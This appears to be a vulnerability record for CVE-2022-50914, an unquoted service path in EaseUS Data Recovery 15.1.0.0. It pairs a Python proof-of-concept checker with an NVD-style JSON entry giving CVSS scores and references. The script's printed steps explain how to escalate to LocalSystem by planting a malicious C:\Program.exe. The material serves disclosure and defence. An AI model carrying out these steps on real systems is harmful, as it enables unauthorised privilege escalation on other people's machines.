CVE-2022-50914

#!/usr/bin/env python3 """ CVE-2022-50914 PoC - EaseUS Data Recovery Unquoted Service Path This PoC demonstrates the unquoted service path vulnerability in EaseUS UPDATE SERVICE. """ import os import sys import subprocess def check_vulnerability(): """Check if the system is vulnerable to unquoted service path""" try: # Query the EaseUS service configuration result = subprocess.run( ['sc', 'qc', 'EaseUS Update Service'], capture_output=True, text=True ) output = result.stdout # Check if BINARY_PATH_NAME contains spaces without quotes if 'BINARY_PATH_NAME' in output: lines = output.split('\n') for line in lines: if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() # Check for unquoted path with spaces if ' ' in path and not path.startswith('"'): print(f"Vulnerable path found: {path}") print("\n[!] System is vulnerable to Unquoted Service Path attack") print("[!] An attacker with write access can place a malicious executable") print("[!] in an intermediate directory to achieve privilege escalation") return True print("[+] Service not found or path is properly quoted") return False except Exception as e: print(f"Error checking vulnerability: {e}") return False def exploit_demo(): """ Exploitation steps (for educational purposes only): 1. Identify the unquoted path: C:\Program Files\EaseUS\Data Recovery\bin\ensserver.exe 2. Create a malicious executable 3. Place it at an intermediate path location 4. Wait for service restart or trigger service restart 5. Malicious code executes with LocalSystem privileges """ print("\nExploitation steps:") print("1. Identify vulnerable service path") print("2. Create malicious executable (e.g., Program.exe)") print("3. Copy to: C:\\Program.exe") print("4. Wait for service restart or reboot") print("5. Attacker gains LocalSystem privileges") if __name__ == '__main__': print("CVE-2022-50914 - EaseUS Data Recovery Unquoted Service Path") print("=" * 60) check_vulnerability() exploit_demo()

{"cve": {"id": "CVE-2022-50914", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:54.713", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EaseUS Data Recovery 15.1.0.0 contains an unquoted service path vulnerability in the EaseUS UPDATE SERVICE executable. Attackers can exploit the unquoted path to inject and execute malicious code with elevated LocalSystem privileges."}, {"lang": "es", "value": "EaseUS Data Recovery 15.1.0.0 contiene una vulnerabilidad de ruta de servicio sin comillas en el ejecutable EaseUS UPDATE SERVICE. Los atacantes pueden explotar la ruta sin comillas para inyectar y ejecutar código malicioso con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.easeus.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50886", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/easeus-data-recovery-ensserverexe-unquoted-service-path", "source": "[email protected]"}]}}